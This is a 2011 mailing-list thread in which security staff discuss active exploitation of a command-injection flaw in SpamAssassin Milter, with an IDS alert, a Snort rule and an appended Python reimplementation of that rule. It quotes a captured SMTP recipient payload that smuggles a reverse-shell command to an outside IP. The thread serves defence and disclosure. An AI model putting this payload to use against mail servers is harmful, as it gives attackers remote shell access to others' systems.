Copying the spamass-milter mailing list.

On 02/10/2011 09:42 AM, Michael Scheidell wrote:
>> in case you are using spamassassin milter:
>>
>> active exploits going on.
>>
>> <http://seclists.org/fulldisclosure/2010/Mar/140>
>> <http://www.securityfocus.com/bid/38578>
>>
>> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
>>
>> I don't see anything on bugtraq about a fix.
On 02/10/2011 10:21 AM, David F. Skoll wrote:
> Aieee.... popen() in security-sensitive software!??!??
>
> Also, why does the milter process run as root? That seems like a huge
> hole all by itself.

Does this affect sendmail as well as postfix? I assume so, but wanted an explicit confirmation. (I am no longer managing an environment that uses this milter and therefore cannot verify myself.)
--- Begin Message ---
heads up: in case you are using spamassassin milter:

active exploits going on.

<http://seclists.org/fulldisclosure/2010/Mar/140>
<http://www.securityfocus.com/bid/38578>

Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1

I don't see anything on bugtraq about a fix.

-------- Original Message --------
Subject: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

The rule is only looking for this:

  content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";

Personally, I would probably block it. Although, if we're not seeing this sort of thing pop up on customers' boxes, a manual block in scanner2 is sufficient for now, right?

Either way, let me know and I'll block/unblock/leave alone.

--
John Meyer
Associate Security Engineer | SECNAP Network Security
Office: (561) 999-5000 x:1235 Direct: (561) 948-2264

From: Michael Scheidell
Sent: Thursday, February 10, 2011 12:25 PM
To: John Meyer
Cc: Jonathan Scheidell; Anthony Wetula
Subject: Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

is the snort rule specific enough that you can block the offending ip for 5 mins? (if it's a real smtp server, it will retry) and let legit email through.

On 2/10/11 12:12 PM, John Meyer wrote:

I don't like the looks of this. I blocked that IP with samtool.

Payload:

  rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"
  data
  .
  quit

--
John Meyer
Associate Security Engineer | SECNAP Network Security

From: SECNAP Network Security
Sent: Thursday, February 10, 2011 12:01 PM
To: security-al...@scanner2.secnap.com
Subject: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

02/10-12:00:59 <trust1> TCP 62.206.228.188:56691 --> 10.70.1.33:25
[1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
[Classification: Attempted User Privilege Gain] [Priority: 1]

--
Michael Scheidell, CTO
o: 561-999-5000 d: 561-948-2259
SECNAP Network Security Corporation
--- End Message ---
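The two content matches John Meyer quotes from the ET rule, reimplemented in Python as an added example (not part of this thread and not Snort's own matcher) and run over constructed SMTP command lines: `to:` must appear case-insensitively within the first 10 payload bytes, and `+:"|` may appear anywhere in the payload.

```python
# Added example: reimplementation of the two content checks quoted above,
#   content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";
# depth:10 limits the first match to the first 10 payload bytes; the second
# content carries no relative modifier, so Snort searches the whole payload.

FIRST = b"to:"      # to|3A|
SECOND = b'+:"|'    # +|3A|"|7C|
DEPTH = 10


def matches_rule(payload: bytes) -> bool:
    """True when the payload satisfies both content matches."""
    head = payload[:DEPTH].lower()   # nocase modifies only the "to:" content
    if FIRST not in head:
        return False
    return SECOND in payload


def scan_session(lines):
    """Yield (line_no, line) for each SMTP command line that trips the rule."""
    for n, line in enumerate(lines, 1):
        if matches_rule(line):
            yield n, line


# Constructed sample session: ordinary commands plus one recipient shaped like
# the injection in the thread, with the command body replaced by a harmless
# placeholder. Plus-addressing alone does not match; the rule keys on +:"|.
SAMPLE = [
    b"EHLO mail.example.net",
    b"MAIL FROM:<sender@example.net>",
    b"RCPT TO:<alice+newsletter@example.com>",   # legitimate plus-addressing
    b'rcpt to: root+:"|/bin/true"',               # matches both contents
    b"DATA",
]

if __name__ == "__main__":
    for n, line in scan_session(SAMPLE):
        print(f"line {n}: rule would fire on {line!r}")
```

Because of depth:10, the same recipient string preceded by more than a few bytes of padding does not match; that is the gap behind the question of whether the signature is specific enough to block on.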